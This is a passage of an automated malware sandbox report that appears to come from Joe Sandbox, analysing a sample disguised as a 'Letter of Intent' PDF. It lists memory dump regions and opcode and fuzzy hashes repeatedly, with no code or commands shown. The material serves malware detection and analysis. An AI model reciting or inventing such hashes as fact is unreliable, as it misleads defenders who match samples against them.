                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e355694cc3f33610a8e4499b16afd4f4fb9f184dcc066dfa28e9dcfe3990eff
                                                                                      • Instruction ID: 57761449af3537e98e51d3c36f948676b87a98e73c50414d191321abdcb7e114
                                                                                      • Opcode Fuzzy Hash: 1e355694cc3f33610a8e4499b16afd4f4fb9f184dcc066dfa28e9dcfe3990eff
                                                                                      • Instruction Fuzzy Hash: 9E0171B1A41348ABDB04DFA9D845FAFBBF8EF44710F444466B940EB380DAB4DA01CB95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ee46a9cbc66a064148fa36eebbda4aee77393e40e047c5ac5408e80621a97774
                                                                                      • Instruction ID: 8cdf961bcc03129ea8acd81c2cf437587b582f23017314e11efe6394c656a83c
                                                                                      • Opcode Fuzzy Hash: ee46a9cbc66a064148fa36eebbda4aee77393e40e047c5ac5408e80621a97774
                                                                                      • Instruction Fuzzy Hash: AB018471A00358EBD700DBA5D815FAFBBB8EF44700F444466B500EB280EAB4DA01CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                                      • Instruction ID: 53f37ae4fefacab7992b9b6ab6edafa5c2232bb7dc3f3d75dd1b874e1aae538f
                                                                                      • Opcode Fuzzy Hash: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                                      • Instruction Fuzzy Hash: 39114C75640A84CFC375CB04C590FA5B7A1EB88B20F14887CD54E8BB80CF79A846DF90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc0a213a8e4d5fe2c50ea61406177969988b5ed1229e0cc85574cb95d96d0fa1
                                                                                      • Instruction ID: 54e73052fc99994a48b9c59d02927478e633096c30ab9b38a72d7dcb63520af4
                                                                                      • Opcode Fuzzy Hash: fc0a213a8e4d5fe2c50ea61406177969988b5ed1229e0cc85574cb95d96d0fa1
                                                                                      • Instruction Fuzzy Hash: 5E118074D00249EFCB04DFA8D444A9EB7B4EF08704F14845AB915EB350E774DA02CB64
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9db5735ec078086b31dfa0ce29edc39258380481b01992e90fd25834212b9be
                                                                                      • Instruction ID: 1ca70119e09da0748860c77faabca3cfff165d28fc242865074597299e8bbe3c
                                                                                      • Opcode Fuzzy Hash: d9db5735ec078086b31dfa0ce29edc39258380481b01992e90fd25834212b9be
                                                                                      • Instruction Fuzzy Hash: 71012CB1A1120DABDB00DFA9D9559DEBBF8EF48704F14445AFA00FB350D674AA018BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cedbd0750c7d5355cf606850b23bc6135d478124dd85ff9c46637b5a4a32e0f
                                                                                      • Instruction ID: 93214002a1222ff4e205d922f6221bd28c73a55ebb7b232a0cfe53735ee79538
                                                                                      • Opcode Fuzzy Hash: 3cedbd0750c7d5355cf606850b23bc6135d478124dd85ff9c46637b5a4a32e0f
                                                                                      • Instruction Fuzzy Hash: 6F017CB1A0030CABDB00DFA9D9419EEB7F8EF48304F10445AFA00F7341D674EA018BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0fdbb6fc9670470acd9e627589b34635c4f6f898836dcc45c39db362de83d5ca
                                                                                      • Instruction ID: 1ae345d20d0d9f59bddad70d9abea986210a51a626b5eb0578108e4d320bea43
                                                                                      • Opcode Fuzzy Hash: 0fdbb6fc9670470acd9e627589b34635c4f6f898836dcc45c39db362de83d5ca
                                                                                      • Instruction Fuzzy Hash: 56012CB1A0020DABDB00DFA9D9459DEB7F8EF48744F54445AFA00FB390DA74AA018BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction ID: 325c693325975c4101251344699219d3b7f708a28cea483c337057d0edcb6dd2
                                                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction Fuzzy Hash: C4F0AF72A01629AFE319CF5CC980F6ABBEDEF45694F014079DA01EF271E671DE04CA94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfb4a3ee94ed77c88eb0d3a9bab6c2770203bfe68816580865210a8e542d3c42
                                                                                      • Instruction ID: b8b55233effaa4135f40936c6de2cbffe93233e1720ffc42dfd57cb92a450c13
                                                                                      • Opcode Fuzzy Hash: cfb4a3ee94ed77c88eb0d3a9bab6c2770203bfe68816580865210a8e542d3c42
                                                                                      • Instruction Fuzzy Hash: 911109B0A10249DFDB04DFA9D555A9DFBF4FF08304F0446AAE518EB382EA74D9418B94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e522d7ca0188f434e945ef017225d1aa3ae0fd9cbb5b8c23e5fa7b8477c4793
                                                                                      • Instruction ID: 2f627ce7ef090cfe71191553c1616ebeaddc9e9cc83d3239f85a2e8ea1ebafbe
                                                                                      • Opcode Fuzzy Hash: 0e522d7ca0188f434e945ef017225d1aa3ae0fd9cbb5b8c23e5fa7b8477c4793
                                                                                      • Instruction Fuzzy Hash: F40140B4E0030D9FCB04DFA9C545AAEB7F4EF08304F008465A915E7340E674DA00CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ba629df79da04a902e4caeb4a6fd150146d1b02d1f16de7db0952dc0050a8fe
                                                                                      • Instruction ID: 4aedde252593eb4d9cb0d760a7e8d8ab3b4389d6b1e30a97df045e80c64829bd
                                                                                      • Opcode Fuzzy Hash: 7ba629df79da04a902e4caeb4a6fd150146d1b02d1f16de7db0952dc0050a8fe
                                                                                      • Instruction Fuzzy Hash: C3F04472A10748ABD704DBB9C415AAEB7B8EF44710F4484A6E611EB290EAB4DA018B65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                      • Instruction ID: 74c8112902dff48ecfd81d8290884e694344aec746275d76e8ff8105734e2d4d
                                                                                      • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                      • Instruction Fuzzy Hash: 17F0F6FAA013666FEB14C7A98940FEE77ACAFC0764F048995BF0197148DA30D940CA90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d303a9a5a672ee782f51806784211d50a9ca65737aabd377fc4a5cf5f9dcfcd6
                                                                                      • Instruction ID: 9d1e6060d342012630c155e4d28fda0fc9efc64f2680fb94d21384f9dc60a8c8
                                                                                      • Opcode Fuzzy Hash: d303a9a5a672ee782f51806784211d50a9ca65737aabd377fc4a5cf5f9dcfcd6
                                                                                      • Instruction Fuzzy Hash: 88012CB0E00209DFDB04DFA9C545B9EF7F4FF08304F1486A9A519EB381EA749A418BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                      • Instruction ID: 5a8c27ef4b3d0b59c4e57110faa6dba2108dfe9430ff248cc99fc3271fafc943
                                                                                      • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                      • Instruction Fuzzy Hash: 75F03CB6940204ABE7119B64CD41FDAB7BCEB04714F0005A6AA56E6194EAB0AA44CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d519f89a698dd514a9c2e57c8c8ccf1b45ba4a44f8e089fbb50d6e4f46ecbc09
                                                                                      • Instruction ID: 2158deb5d7e395b04ee906e00907921123d9ce32236d142bfbcff45c14622044
                                                                                      • Opcode Fuzzy Hash: d519f89a698dd514a9c2e57c8c8ccf1b45ba4a44f8e089fbb50d6e4f46ecbc09
                                                                                      • Instruction Fuzzy Hash: 49F04FB5E0024CEFCB04DFA9D545A9EB7F4EF48300F408469BA45EB391EA74EA01CB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 888448c3008294906c2f30ad96846fc51675a23281903f9d55c7b149f302a83d
                                                                                      • Instruction ID: bef40231e674153308e949d775def51251ec07c25498d9a4df655302b759cc4c
                                                                                      • Opcode Fuzzy Hash: 888448c3008294906c2f30ad96846fc51675a23281903f9d55c7b149f302a83d
                                                                                      • Instruction Fuzzy Hash: 4DF044B4A0024CEFDB04DFA8D545A9DB7F4EF08304F504455B945EB380D674DA00CB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef4750456ae3852a60f4691eeb70dfdb16eb11f2ef1d1bcb091cf1d683269fb5
                                                                                      • Instruction ID: a3e11da3a89f7a839211be1c838a128531d80fc7972c450cb3ba560ab76639d8
                                                                                      • Opcode Fuzzy Hash: ef4750456ae3852a60f4691eeb70dfdb16eb11f2ef1d1bcb091cf1d683269fb5
                                                                                      • Instruction Fuzzy Hash: FDF0E2713806119AF766BB2CDD40B5732E1BB50B80F180C68E644CF5A4DA60CCC1DB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a4a0879314a1d20042ae32072e193179ee7911a483331254d45d7d2dd850e57
                                                                                      • Instruction ID: bc53ef14af1d2181d7c8ab4529e71d026981a64cefb70e4919d41278d5808704
                                                                                      • Opcode Fuzzy Hash: 2a4a0879314a1d20042ae32072e193179ee7911a483331254d45d7d2dd850e57
                                                                                      • Instruction Fuzzy Hash: 13F062B5A10248EFDB04DFA9C505EAEB7F4AF04304F444469E601EB291EA74DA01CB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4dca628c5900d0a33070d9c740d3d00a20ee4995e50ef2c3ff6a138e73547ed2
                                                                                      • Instruction ID: ea8e2b78acd92ec666422cfe6689d4d9b8e7712854e2a8ab1afb2eb5aa8fc3ae
                                                                                      • Opcode Fuzzy Hash: 4dca628c5900d0a33070d9c740d3d00a20ee4995e50ef2c3ff6a138e73547ed2
                                                                                      • Instruction Fuzzy Hash: 3FF0B470A1034C9FD704DBB8D445E5DB7F4EF44704F508494E601EB280DAB4D9018B18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e82c240127ee15e288337d6a6c64bf4df658bacdecbe7daa538d43ef0ec7233
                                                                                      • Instruction ID: 4277c7f0ff1cc617fda6328faf62e6a1a457dcb900c4b6488c671b2daffb2132
                                                                                      • Opcode Fuzzy Hash: 1e82c240127ee15e288337d6a6c64bf4df658bacdecbe7daa538d43ef0ec7233
                                                                                      • Instruction Fuzzy Hash: 76F0B4B0A103099BD704DBA4D505E6EB3F4EF04304F444858A541EB285EA74D9008B54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dfae8066f0fd555ca254894fffd600b45311410ec1799fe0a909f694e258f014
                                                                                      • Instruction ID: 17eed96a40887086061c0d720a7710b388a9436de9d20d0e9197b7b7e7d8edba
                                                                                      • Opcode Fuzzy Hash: dfae8066f0fd555ca254894fffd600b45311410ec1799fe0a909f694e258f014
                                                                                      • Instruction Fuzzy Hash: C6F0B470A107489BD704DFB5D505E6EB3F4EF44704F444868A501EB280EAB4D900CB18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07465dbd088d7ed6d4fd5dee63399da8b2eb969b36211f6c3a248cfa3d236ea3
                                                                                      • Instruction ID: d506ae47fbdbe1f578546a52c5dd814de020a2d5ff159509ba84d2a70b55eb0a
                                                                                      • Opcode Fuzzy Hash: 07465dbd088d7ed6d4fd5dee63399da8b2eb969b36211f6c3a248cfa3d236ea3
                                                                                      • Instruction Fuzzy Hash: CAF0BE7D9256989FF311C718C680B9A73EAEB00BA4F4D58A4E48587912C730E980CA50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59b3620df9b3d4ce7a3516f21eac8dd4ae698701890757b8f436f0b67fab2a3e
